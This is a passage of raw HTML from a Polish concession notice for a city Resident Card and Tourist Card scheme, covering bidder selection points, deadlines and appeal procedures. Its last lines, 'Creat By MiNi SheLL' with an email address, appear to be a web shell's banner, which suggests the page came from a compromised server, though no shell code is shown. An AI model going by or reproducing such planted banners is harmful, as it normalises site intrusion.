Umowie.Rodzaje czynności niezbędnych do realizacji umowy koncesji, których dotyczą wymagania zatrudnienia przez Partnera Prywatnego lub podwykonawcę na podstawie umowy o pracę osób wykonujących wskazane czynności w zakresie realizacji umowyPodmiot Publiczny wymaga aby wszystkie osoby odpowiedzialne za pełną obsługę w tym m.in. za wydawanie i aktywowanie Karty Mieszkańca i Karty Turysty będących przedmiotem umowy koncesji, których wykonanie polega na wykonywaniu pracy w sposób określony w art. 22 § 1 Kodeksu pracy, były wykonywane przez osoby zatrudnione przez Partnera Prywatnego lub podwykonawcę na podstawie umowy o pracę. Zgodnie z art. 22 § 1 Kodeksu pracy, przez nawiązanie stosunku pracy pracownik zobowiązuje się do wykonywania pracy określonego rodzaju na rzecz pracodawcy i pod jego kierownictwem oraz w miejscu i czasie wyznaczonym przez pracodawcę, a pracodawca - do zatrudniania pracownika za wynagrodzeniem.Partner Prywatny lub podwykonawca zatrudni wyżej wymienione osoby na co najmniej okres udziału przez nie w realizacji koncesji.</span> <br /> </div> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <br /> <b>III.5.4 Zamawiający wymaga podania imion i nazwisk osób wyznaczonych do realizacji umowy koncesji wraz z informacją o kwalifikacjach zawodowych tych osób </b>:&#160;&#160;<span id="ctl00_ContentPlaceHolder1_czy_III_5_4">Nie</span> <br /> </div> </div> <div class="headerLarge_xforms" style="text-align: center"> <u> SEKCJA IV: PROCEDURA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <br /> <b>IV.1 Zamawiający zaprasza do składania:</b> <br /> <b>ofert &#160;&#160;</b><span id="ctl00_ContentPlaceHolder1_czy_IV_1_ofert">Nie</span>,&#160;albo&#160;&#160; <br /> <b>wniosków o dopuszczenie do udziału w postępowaniu o zawarcie umowy koncesji&#160;&#160;</b><span id="ctl00_ContentPlaceHolder1_czy_IV_1_wnioskow">Tak</span> <br /> </div> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <br /> <b>IV.2 Termin składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu:</b> <br /> <b>Data:</b><span id="ctl00_ContentPlaceHolder1_IV_2_data">2020-07-10</span> <br /> <b>Godzina:</b><span id="ctl00_ContentPlaceHolder1_IV_2_godzina">10:00</span> <br /> </div> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <br /> <b>IV.3 Języki, w których można sporządzać oferty albo wnioski o dopuszczenie do udziału w postępowaniu:</b> <br /> <span id="ctl00_ContentPlaceHolder1_IV_3">Korespondencja w postępowaniu prowadzona jest w języku polskim. Oznacza to, że wszelka korespondencja w języku obcym winna być złożona wraz z tłumaczeniem na język polski.Wniosek musi być sporządzony w języku polskim. Każdy dokument składający się na Wniosek sporządzony w innym języku niż język polski musi być złożony wraz z tłumaczeniem na język polski poświadczonym przez Wykonawcę. W przypadku wątpliwości lub rozbieżności w treści Wniosku i jego tłumaczeniu na język polski, wiążące będą zapisy w języku polskim.</span> <br /> </div> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <br /> <b>IV.4 Zasady, którymi zamawiający będzie kierował się przy ograniczaniu liczby wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu</b><i>(jeżeli dotyczy)</i>: <br /> <span id="ctl00_ContentPlaceHolder1_IV_4">1. Jeżeli liczba Wykonawców, którzy spełniają kryteria kwalifikacji oraz nie podlegają wykluczeniu z Postępowania, będzie nie większa niż 3, Podmiot Publiczny zaprosi do udziału w postępowaniu wszystkich Wykonawców spełniających te warunki bez przeprowadzania kwalifikacji punktowej Wniosków.2. Jeżeli liczba Wykonawców, którzy spełniają kryteria kwalifikacji oraz nie podlegają wykluczeniu z Postępowania będzie większa niż 3, wówczas Podmiot Publiczny zaprosi do udziału w Postępowaniu 3 Wykonawców, którzy spełniają kryteria kwalifikacji określone w pkt 5.3.2.1 oraz nie podlegają wykluczeniu z Postępowania i którzy uzyskają największą liczbę punktów, obliczonych w sposób określony poniżej.2.1. Podmiot Publiczny przyzna Wykonawcy:2.1.1. - 1 punkt za dysponowanie od jednego do trzech certyfikowanych przez Polską Organizację Turystyczną punktów/centrów informacji turystycznej w ramach polityki zarządzania jakością standardu Polskiego Systemu Informacji Turystycznej oraz Regulaminu Certyfikacji Informacji Turystycznej w Polsce lub tożsamego systemu certyfikacji w innym państwie członkowskim. -	2 punkty za dysponowanie od 4 i powyżej certyfikowanych przez Polską Organizację Turystyczną punktów/centrów informacji turystycznej w ramach polityki zarządzania jakością standardu Polskiego Systemu Informacji Turystycznej oraz Regulaminu Certyfikacji Informacji Turystycznej w Polsce lub tożsamego systemu certyfikacji w innym państwie członkowskim. Jeśli suma przyznanych Wykonawcom punktów będzie równa, wówczas Podmiot Publiczny weźmie pod uwagę czterostopniową skalę certyfikacji. Na potrzeby oceny kryterium selekcji w zakresie zdolności technicznej przyjmuje się następujące definicje:Jako punkt/centrum certyfikowane przez Polską Organizację Turystyki rozumie się podmioty informacji turystycznej, które przeszły pomyślnie proces certyfikacji i otrzymały certyfikat w formie dyplomu potwierdzający kategorię. Termin jego ważności nie może wygasać przed dniem 31 grudnia 2020 roku.2.1.2. -	1 punkt za każde dodatkowe wdrożenie analogicznego systemu dla miast, o których mowa w rozdziale 5, punkcie 5.3.2.1. ust.2.1. Opisu Postępowania Na potrzeby oceny kryterium selekcji w zakresie zdolności technicznej przyjmuje się następujące definicje:analogiczny system, rozumie się przez uruchomienie i wdrożenie karty upoważniającej do skorzystania z usług i atrakcji oferowanych przez Miasto i inne podmioty w postaci rabatów, ulg, premii (np. na wydarzenia: kulturalne, sportowe, komunikacyjne, rekreacyjne) oraz z profitów u partnerów handlowych.3. W przypadku, gdy w wyniku zastosowania wskazanego powyżej kryterium dodatkowego dwóch, bądź większa liczba Wykonawców uzyska tę liczbę punktów, o kolejności Wykonawców decydować będzie posiadanie większych środków finansowych i/lub zdolności kredytowej, ponad minimum określone w rozdziale 5, punkt 5.3.2.1 Opisu Postępowania. Ocena w powyższym zakresie zostanie dokonana na podstawie dokumentów przedłożonych przez Wykonawcę na potrzeby potwierdzenia spełniania kryteriów kwalifikacji w zakresie zdolności ekonomicznej i finansowej (informacja banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzająca wysokość posiadanych środków finansowych lub zdolność kredytową Wykonawcy, w okresie nie wcześniejszym niż 1 miesiąc przed upływem terminu składania Wniosków).4. Podmiot Publiczny informuje, iż w przypadku gdy Wykonawca powoła się na zdolności innych podmiotów, Podmiot Publiczny nie będzie uwzględniał potencjału tych podmiotów w punktacji w ramach klasyfikacji (nie będzie przyznawał dodatkowych punktów).5. Podmiot Publiczny nie przyzna dodatkowych punktów za wykazanie tych samych realizacji w Wykazie złożonym na potrzeby potwierdzenia spełniania kryteriów kwalifikacji .6. Podmiot Publiczny informuje, iż w przypadku gdy liczba Partnerów Prywatnych, którzy spełnią kryteria kwalifikacji będzie większa niż 3, dokonując dodatkowej punktacji, Podmiot Publiczny nie będzie wzywał do uzupełnienia lub poprawienia Wniosku. W celu potwierdzenia spełniania przez Podmiot Prywatny kryteriów selekcji w zakresie ograniczenia liczby wykonawców zaproszonych do udziału w postępowaniu o zawarcie umowy o ppp w pkt 5.3.2.4. ust. 2 ppkt. 2.1. Opisu Postępowania, Podmiot Publiczny żąda od Wykonawców przedłożenia następujących dokumentów:1)	Wykaz punktów/ centrów informacji turystycznej certyfikowanych przez Polską Organizację Turystyczną (formularz stanowi załącznik do Opisu Postępowania- wykazów punktów/ centrów)2)	Wykaz dodatkowych wdrożeń analogicznego systemu dla miast, o których mowa w rozdziale 5, punkt 5.3.2.1, ust. 2.1 (formularz stanowi załącznik do Opisu Postępowania- wykaz dodatkowych wdrożeń) </span> <br /> Minimalna liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu&#160;&#160;<span id="ctl00_ContentPlaceHolder1_IV_4_czy_minimalna_liczba">Tak</span>&#160;&#160;<span id="ctl00_ContentPlaceHolder1_IV_4_minimalna_liczba">3</span> <br /> Maksymalna liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu&#160;&#160;<span id="ctl00_ContentPlaceHolder1_IV_4_czy_maks_liczba">Nie</span>&#160;&#160;<span id="ctl00_ContentPlaceHolder1_IV_4_maks_liczba"></span> <br /> Obiektywne i niedyskryminacyjne zasad, którymi zamawiający będzie kierował się przy ograniczaniu liczby wykonawców zapraszanych do udziału w postępowaniu: <br /> <span id="ctl00_ContentPlaceHolder1_IV_4_zasady">Jeżeli liczba Wykonawców, którzy spełniają kryteria kwalifikacji oraz nie podlegają wykluczeniu z Postępowania będzie większa niż 3, wówczas Podmiot Publiczny zaprosi do udziału w Postępowaniu 3 Wykonawców, którzy spełniają kryteria kwalifikacji określone w pkt 5.3.2.1 oraz nie podlegają wykluczeniu z Postępowania i którzy uzyskają największą liczbę punktów, obliczonych w sposób określony poniżej.2.1. Podmiot Publiczny przyzna Wykonawcy:2.1.1. - 1 punkt za dysponowanie od jednego do trzech certyfikowanych przez Polską Organizację Turystyczną punktów/centrów informacji turystycznej w ramach polityki zarządzania jakością standardu Polskiego Systemu Informacji Turystycznej oraz Regulaminu Certyfikacji Informacji Turystycznej w Polsce lub tożsamego systemu certyfikacji w innym państwie członkowskim. -	2 punkty za dysponowanie od 4 i powyżej certyfikowanych przez Polską Organizację Turystyczną punktów/centrów informacji turystycznej w ramach polityki zarządzania jakością standardu Polskiego Systemu Informacji Turystycznej oraz Regulaminu Certyfikacji Informacji Turystycznej w Polsce lub tożsamego systemu certyfikacji w innym państwie członkowskim. Jeśli suma przyznanych Wykonawcom punktów będzie równa, wówczas Podmiot Publiczny weźmie pod uwagę czterostopniową skalę certyfikacji. Na potrzeby oceny kryterium selekcji w zakresie zdolności technicznej przyjmuje się następujące definicje:Jako punkt/centrum certyfikowane przez Polską Organizację Turystyki rozumie się podmioty informacji turystycznej, które przeszły pomyślnie proces certyfikacji i otrzymały certyfikat w formie dyplomu potwierdzający kategorię. Termin jego ważności nie może wygasać przed dniem 31 grudnia 2020 roku.2.1.2. -	1 punkt za każde dodatkowe wdrożenie analogicznego systemu dla miast, o których mowa w rozdziale 5, punkcie 5.3.2.1. ust.2.1. Opisu Postępowania Na potrzeby oceny kryterium selekcji w zakresie zdolności technicznej przyjmuje się następujące definicje:analogiczny system, rozumie się przez uruchomienie i wdrożenie karty upoważniającej do skorzystania z usług i atrakcji oferowanych przez Miasto i inne podmioty w postaci rabatów, ulg, premii (np. na wydarzenia: kulturalne, sportowe, komunikacyjne, rekreacyjne) oraz z profitów u partnerów handlowych.3. W przypadku, gdy w wyniku zastosowania wskazanego powyżej kryterium dodatkowego dwóch, bądź większa liczba Wykonawców uzyska tę liczbę punktów, o kolejności Wykonawców decydować będzie posiadanie większych środków finansowych i/lub zdolności kredytowej, ponad minimum określone w rozdziale 5, punkt 5.3.2.1 Opisu Postępowania. Ocena w powyższym zakresie zostanie dokonana na podstawie dokumentów przedłożonych przez Wykonawcę na potrzeby potwierdzenia spełniania kryteriów kwalifikacji w zakresie zdolności ekonomicznej i finansowej (informacja banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzająca wysokość posiadanych środków finansowych lub zdolność kredytową Wykonawcy, w okresie nie wcześniejszym niż 1 miesiąc przed upływem terminu składania Wniosków).4. Podmiot Publiczny informuje, iż w przypadku gdy Wykonawca powoła się na zdolności innych podmiotów, Podmiot Publiczny nie będzie uwzględniał potencjału tych podmiotów w punktacji w ramach klasyfikacji (nie będzie przyznawał dodatkowych punktów).5. Podmiot Publiczny nie przyzna dodatkowych punktów za wykazanie tych samych realizacji w Wykazie złożonym na potrzeby potwierdzenia spełniania kryteriów kwalifikacji .6. Podmiot Publiczny informuje, iż w przypadku gdy liczba Partnerów Prywatnych, którzy spełnią kryteria kwalifikacji będzie większa niż 3, dokonując dodatkowej punktacji, Podmiot Publiczny nie będzie wzywał do uzupełnienia lub poprawienia Wniosku. </span> </div> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <br /> <b>IV.5 Kryteria oceny ofert:</b> <br /> Kryteria i ich opis: <br /> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kryteria</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Znaczenie</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Podział zadań i ryzyk związanych z przedsięwzięciem pomiędzy Podmiotem Publicznym, a Partnerem Prywatnym </TD><TD style='border: 1px solid black;border-collapse: collapse;'>0,00</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Czas wdrożenia systemu</TD><TD style='border: 1px solid black;border-collapse: collapse;'>0,00</TD></TR></TABLE> <br /> </div> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <br /> <b>IV.6 Unieważnienie postępowania</b> <br /> <b>Przewiduje się unieważnienie postępowania, jeżeli środki, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części umowy koncesji, nie zostaną przyznane </b>&#160;&#160;Tak <br /> <br /> </div> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <br/> <b>IV. 7 Informacje dodatkowe</b><i>(jeżeli dotyczy)</i>: <br /> <span id="ctl00_ContentPlaceHolder1_IV_7_informacje_dodatkowe">1.	Zgodnie z art. 39 ust. 1 Ustawy o umowie koncesji, Zamawiający unieważnia postępowanie o zawarcie umowy koncesji, jeżeli: 1.1. nie złożono oferty albo wniosku o dopuszczenie do udziału w postępowaniu o zawarcie umowy koncesji;1.2. wszystkie oferty albo wnioski o dopuszczenie do udziału w postępowaniu o zawarcie umowy koncesji zostały odrzucone.2. Zamawiający może unieważnić postępowanie o zawarcie umowy koncesji, jeżeli: 2.1. zachodzą obiektywnie uzasadnione przesłanki, w szczególności wystąpiła istotna zmiana okoliczności powodująca, że prowadzenie postępowania o zawarcie umowy koncesji lub wykonanie przedmiotu umowy koncesji nie leży w interesie publicznym; 2.2. środki, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części umowy koncesji, nie zostały mu przyznane;2.3. postępowanie o zawarcie umowy koncesji obarczone jest niemożliwą do usunięcia wadą uniemożliwiającą zawarcie niepodlegającej unieważnieniu umowy koncesji. </span> <br /> </div> </div> <div class="headerLarge_xforms" style="text-align: center"> <u> SEKCJA V: INFORMACE UZUPEŁNIAJĄCE </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <br/> <b>V.1 Zmiana umowy</b> <br /> <b>Przewiduje się zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której zostanie dokonany wybór wykonawcy:</b>&#160;&#160;<span id="ctl00_ContentPlaceHolder1_V_1_czy_zmiany_umowy">Nie</span><br /> Zakres, charakter zmian oraz warunki wprowadzenia zmian : <br /> <span id="ctl00_ContentPlaceHolder1_V_1_zakres_zmian"></span> <br /> </div> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <br/> <b>V.2 Informacje o charakterze poufnym</b> <br /> <b>Sposób udostępniania informacji o charakterze poufnym</b><i>(jeżeli dotyczy)</i>: <br /> <span id="ctl00_ContentPlaceHolder1_V_2_sposob_udostepnienia"></span> <br /> <b>Środki służące ochronie informacji o charakterze poufnym</b><i>(jeżeli dotyczy)</i>: <br /> <span id="ctl00_ContentPlaceHolder1_V_2_srodki_ochrony"></span> <br /> </div> </div> <div class="headerLarge_xforms" style="text-align: center"> <u> V.3 WNOSZENIE ODWOŁAŃ </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <br/> <b>V.3.1 Organ właściwy do rozpoznawania odwołań</b> <br /> Nazwa: <span id="ctl00_ContentPlaceHolder1_V_3_Nazwa">Prezes Krajowej Izby Odwoławczej </span>, Adres: <span id="ctl00_ContentPlaceHolder1_V_3_Adres">ul. Postępu 17A, Warszawa 02-676 </span>, Miasto: <span id="ctl00_ContentPlaceHolder1_V_3_Miasto">Warszawa</span>,Kod pocztowy: <span id="ctl00_ContentPlaceHolder1_V_3_Kod">02-676 </span>, Państwo: <span id="ctl00_ContentPlaceHolder1_V_3_Panstwo">Polska</span>, Województwo: <span id="ctl00_ContentPlaceHolder1_V_3_Wojewodztwo">Mazowieckie</span>, tel. <span id="ctl00_ContentPlaceHolder1_V_3_Tel">+48 224587801</span>, e-mail <span id="ctl00_ContentPlaceHolder1_V_3_Email"></span>, faks <span id="ctl00_ContentPlaceHolder1_V_3_Fax">+48 224587800</span>. <br/> Adres strony internetowej (URL): <span id="ctl00_ContentPlaceHolder1_V_3_WWW">http://uzp.gov.pl</span> <br /> </div> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <br/> <b>V.3.2 Informacje na temat terminów wnoszenia odwołań:</b> <br /> <span id="ctl00_ContentPlaceHolder1_V_3_TerminyOdwolan">1.Odwołanie przysługuje wyłącznie od niezgodnej z przepisami ustawy o umowie koncesji na roboty budowlane lub usługi czynności Podmiotu Publicznego podjętej w postępowaniu o udzielenie koncesji lub zaniechania czynności, do której Podmiot Publiczny jest zobowiązany na podstawie ustawy. 2. Odwołanie wnosi się w terminie 10 dni od dnia przekazania informacji o czynności Podmiotu Publicznego stanowiącej podstawę jego wniesienia – jeżeli informacja została przekazana przy użyciu środków komunikacji elektronicznej, albo 15 dni, jeżeli została przekazana w inny sposób; 3. 10 dni od zamieszczenia w Biuletynie Zamówień Publicznych ogłoszenia o koncesji lub zamieszczenia dokumentów koncesji na stronie internetowej, w przypadku odwołania wobec treści ogłoszenia o koncesji lub dokumentów koncesji; 5. Odwołanie powinno wskazywać czynność lub zaniechanie czynności Podmiotu Publicznego, której zarzuca się niezgodność z przepisami ustawy o umowie koncesji na roboty budowlane lub usługi, zawierać zwięzłe przedstawienie zarzutów, określać żądanie oraz wskazywać okoliczności faktyczne i prawne uzasadniające wniesienie odwołania. 6. Odwołanie wnosi się do Prezesa Izby w formie pisemnej w postaci papierowej albo w postaci elektronicznej, opatrzone odpowiednio własnoręcznym podpisem albo kwalifikowanym podpisem elektronicznym. 7. Odwołujący przesyła kopię odwołania Podmiotowi Publicznemu przed upływem terminu do wniesienia odwołania w taki sposób, aby mógł on zapoznać się z jego treścią przed upływem tego terminu. Domniemywa się, iż Podmiot Publiczny mógł zapoznać się z treścią odwołania przed upływem terminu do jego wniesienia, jeżeli przesłanie jego kopii nastąpiło przed upływem terminu do jego wniesienia przy użyciu środków komunikacji elektronicznej. 8. Na orzeczenie Izby stronom oraz uczestnikom postępowania odwoławczego przysługuje skarga do sądu okręgowego właściwego dla siedziby Podmiotu Publicznego, którą wnosi się za pośrednictwem Prezesa Izby w terminie 7 dni od dnia doręczenia orzeczenia Izby, przesyłając jednocześnie jej odpis przeciwnikowi skargi. Złożenie skargi w placówce pocztowej operatora wyznaczonego w rozumieniu ustawy z dnia 23 listopada 2012 r. – Prawo pocztowe (Dz. U. z 2018 r. poz. 2188 ze zm.) jest równoznaczne z jej wniesieniem.</span>. <br /> </div> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <br/> <b>V.3.3 Podmiot udostępniający informacje na temat odwołań</b> <br /> Nazwa: <span id="ctl00_ContentPlaceHolder1_V_3_Udostepniajacy_Nazwa">Prezes Krajowej Izby Odwoławczej</span>, Adres: <span id="ctl00_ContentPlaceHolder1_V_3_Udostepniajacy_Adres">ul. Postępu 17A</span>, Miasto: <span id="ctl00_ContentPlaceHolder1_V_3_Udostepniajacy_Miasto">Warszawa</span>,Kod pocztowy: <span id="ctl00_ContentPlaceHolder1_V_3_Udostepniajacy_Kod">02-676</span>, Państwo: <span id="ctl00_ContentPlaceHolder1_V_3_Udostepniajacy_Panstwo">Polska</span>, Województwo: <span id="ctl00_ContentPlaceHolder1_V_3_Udostepniajacy_Wojewodztwo">Mazowieckie</span>, tel. <span id="ctl00_ContentPlaceHolder1_V_3_Udostepniajacy_Tel"></span>, e-mail <span id="ctl00_ContentPlaceHolder1_V_3_Udostepniajacy_Email"></span>, faks <span id="ctl00_ContentPlaceHolder1_V_3_Udostepniajacy_Fax"></span>. <br/> Adres strony internetowej (URL): <span id="ctl00_ContentPlaceHolder1_V_3_Udostepniajacy_WWW">http://uzp.gov.pl</span> <br /> </div> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <br/> <b>V.3.4 Informacje dodatkowe</b><i>(jeżeli dotyczy)</i>: <br /> <span id="ctl00_ContentPlaceHolder1_V_3_InformacjeDodatkowe"></span> <br /> </div> </div> <div class="headerLarge_xforms" style="text-align: center"> <u> ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH </u> </div> <br /> <div> <br /> </div> <br /> <br /> </div> <br /> <br /> </div> <table> <tr> <td> </td> </tr> </table> </div> <script type="text/javascript">//<![CDATA[//]]></script>

Creat By MiNi SheLL
Email: jattceo@gmail.com